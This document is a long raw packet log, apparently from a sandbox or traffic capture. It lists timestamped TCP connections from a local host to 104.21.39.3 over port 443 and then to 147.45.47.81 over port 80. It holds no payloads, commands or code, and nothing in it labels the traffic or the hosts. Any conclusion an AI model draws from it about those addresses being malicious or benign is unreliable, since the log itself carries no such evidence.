                                                                                                                                                                                Nov 10, 2024 09:18:10.070312977 CET49751443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:10.070427895 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.547991037 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.548059940 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.548108101 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.548142910 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.548161030 CET49751443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:10.548175097 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.548197985 CET49751443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:10.548254967 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.548302889 CET49751443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:10.548304081 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.548316002 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.548410892 CET49751443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:10.548418045 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.552664042 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.552717924 CET49751443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:10.552725077 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.605731964 CET49751443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:10.666158915 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.666234970 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.666270018 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.666292906 CET49751443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:10.666307926 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.666377068 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.666387081 CET49751443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:10.666435957 CET49751443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:10.666567087 CET49751443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:10.666583061 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.666600943 CET49751443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:10.666605949 CET44349751104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.877958059 CET49761443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:10.877973080 CET44349761104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:10.878032923 CET49761443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:10.878432989 CET49761443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:10.878442049 CET44349761104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:11.483103037 CET44349761104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:11.483166933 CET49761443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:11.485563040 CET49761443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:11.485572100 CET44349761104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:11.485825062 CET44349761104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:11.487704039 CET49761443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:11.487894058 CET49761443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:11.487919092 CET44349761104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:12.216906071 CET44349761104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:12.217046022 CET44349761104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:12.217091084 CET49761443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:12.217134953 CET49761443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:12.217152119 CET44349761104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:12.387614012 CET49769443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:12.387646914 CET44349769104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:12.387739897 CET49769443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:12.388032913 CET49769443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:12.388045073 CET44349769104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:12.997669935 CET44349769104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:12.997750044 CET49769443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:13.049911976 CET49769443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:13.049942017 CET44349769104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:13.050239086 CET44349769104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:13.052603006 CET49769443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:13.052839041 CET49769443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:13.052860022 CET44349769104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:13.052915096 CET49769443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:13.052920103 CET44349769104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:13.810373068 CET44349769104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:13.810544014 CET44349769104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:13.810607910 CET49769443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:13.810642004 CET49769443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:13.810656071 CET44349769104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:14.011465073 CET49781443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:14.011511087 CET44349781104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:14.011593103 CET49781443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:14.012017965 CET49781443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:14.012032986 CET44349781104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:14.620763063 CET44349781104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:14.620843887 CET49781443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:14.622363091 CET49781443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:14.622390032 CET44349781104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:14.622626066 CET44349781104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:14.623923063 CET49781443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:14.624063969 CET49781443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:14.624100924 CET44349781104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:14.624160051 CET49781443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:14.624174118 CET44349781104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:15.833820105 CET44349781104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:15.833931923 CET44349781104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:15.833987951 CET49781443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:15.834170103 CET49781443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:15.834188938 CET44349781104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:16.525367975 CET49798443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:16.525410891 CET44349798104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:16.525502920 CET49798443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:16.525999069 CET49798443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:16.526012897 CET44349798104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:17.132427931 CET44349798104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:17.132513046 CET49798443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:17.133733988 CET49798443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:17.133744001 CET44349798104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:17.134011984 CET44349798104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:17.135241032 CET49798443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:17.135339975 CET49798443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:17.135349989 CET44349798104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:17.800438881 CET44349798104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:17.800530910 CET44349798104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:17.800693035 CET49798443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:17.800719023 CET49798443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:17.800734043 CET44349798104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:18.299348116 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.299407005 CET44349808104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:18.299582005 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.300013065 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.300026894 CET44349808104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:18.907203913 CET44349808104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:18.907280922 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.908485889 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.908499002 CET44349808104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:18.908744097 CET44349808104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:18.909923077 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.910691023 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.910716057 CET44349808104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:18.910816908 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.910835981 CET44349808104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:18.910936117 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.910973072 CET44349808104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:18.911094904 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.911115885 CET44349808104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:18.911257029 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.911276102 CET44349808104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:18.911425114 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.911453962 CET44349808104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:18.911463976 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.911627054 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.911649942 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.922322989 CET44349808104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:18.922508955 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.922542095 CET44349808104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:18.922579050 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.922597885 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.922720909 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.922753096 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.928354979 CET44349808104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:18.928555965 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.928601027 CET44349808104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:18.928617954 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:18.928639889 CET44349808104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:21.241398096 CET44349808104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:21.241508007 CET44349808104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:21.241882086 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:21.242053032 CET49808443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:21.242074013 CET44349808104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:21.266938925 CET49824443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:21.266984940 CET44349824104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:21.267064095 CET49824443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:21.267412901 CET49824443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:21.267427921 CET44349824104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:21.877361059 CET44349824104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:21.877432108 CET49824443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:21.878664017 CET49824443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:21.878674030 CET44349824104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:21.878911018 CET44349824104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:21.880367041 CET49824443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:21.880390882 CET49824443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:21.880443096 CET44349824104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:22.362255096 CET44349824104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:22.362358093 CET44349824104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:22.362406969 CET49824443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:22.466820002 CET49824443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:22.466861963 CET44349824104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:22.466876984 CET49824443192.168.2.9104.21.39.3
                                                                                                                                                                                Nov 10, 2024 09:18:22.466882944 CET44349824104.21.39.3192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:22.471154928 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:22.476062059 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:22.476119995 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:22.477693081 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:22.482470036 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.305877924 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.305892944 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.305900097 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.305912018 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.305926085 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.305938959 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.305979013 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.305990934 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.305999994 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.306009054 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.306032896 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.306099892 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.311187983 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.311199903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.311214924 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.311242104 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.355581999 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.425091028 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.425144911 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.425178051 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.425246000 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.425259113 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.425266027 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.425271034 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.425288916 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.425319910 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.425762892 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.425776005 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.425792933 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.425803900 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.425815105 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.425849915 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.426418066 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.426429987 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.426449060 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.426461935 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.426477909 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.426506996 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.540793896 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.540811062 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.540824890 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.540868044 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.540960073 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.540972948 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.540985107 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.541013956 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.541038036 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.541389942 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.541402102 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.541414022 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.541454077 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.541749001 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.541766882 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.541779995 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.541790009 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.541793108 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.541817904 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.545042992 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.545090914 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.545092106 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.545104980 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.545141935 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.656318903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.656335115 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.656346083 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.656380892 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.656481028 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.656491995 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.656502962 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.656526089 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.656558037 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.656858921 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.656878948 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.656891108 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.656918049 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.657279968 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.657293081 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.657303095 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.657336950 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.657371044 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.660613060 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.660624027 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.660685062 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.660697937 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.660706043 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.660708904 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.660748959 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.714827061 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.771956921 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.772032022 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.772043943 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.772057056 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.772069931 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.772103071 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.772104025 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.772319078 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.772331953 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.772342920 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.772392035 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.772392035 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.772763014 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.772774935 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.772784948 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.772815943 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.776177883 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.776223898 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.776246071 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.776268005 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.776312113 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.776326895 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.776340008 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.776350975 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.776392937 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.824120045 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.887553930 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.887600899 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.887614012 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.887624979 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.887690067 CET4983380192.168.2.9147.45.47.81
